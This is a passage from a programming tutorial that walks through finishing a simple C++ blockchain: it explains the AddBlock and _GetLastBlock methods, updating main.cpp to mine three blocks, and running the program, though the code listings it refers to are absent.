The signature we specified in Blockchain.h for AddBlock is added (line 1) followed by setting the sPrevHash variable for the new block from the hash of the last block on the blockchain which we get using _GetLastBlock and its GetHash method (line 2). The block is then mined using the MineBlock method (line 3) followed by the block being added to the _vChain vector (line 4), thus completing the process of adding a block to the blockchain.

Let’s finish this file off by adding the last method:

We add the signature for _GetLastBlock from Blockchain.h (line 1) followed by returning the last block found in the _vChainvector using its back method (line 2).

Right, that’s almost it, let’s test it out!

Remember the main.cpp file? Now’s the time to update it, open it up and replace the contents with the following lines:

This tells the compiler to include the Blockchain.h file we created earlier.

Then add the following lines:

As with most C/C++ programs, everything is kicked off by calling the main method, this one creates a new blockchain (line 2) and informs the user that a block is being mined by printing to the output buffer (line 4) then creates a new block and adds it to the chain (line 5); the process for mining that block will then kick off until a valid hash is found. Once the block is mined the process is repeated for two more blocks.

Time to run it! If you are using CLion simply hit the ‘Run TestChain’ button in the top right hand corner of the window. If you’re old skool, you can compile and run the program using the following commands from the command line:

If all goes well you should see an output like this:

Congratulations, you have just written a blockchain from scratch in C++, in case you got lost I’ve put all the files into a Github repo. Since the original code for Bitcoin was also written in C++, why not take a look at its code and see what improvements you can make to what we’ve started off today?

Orig post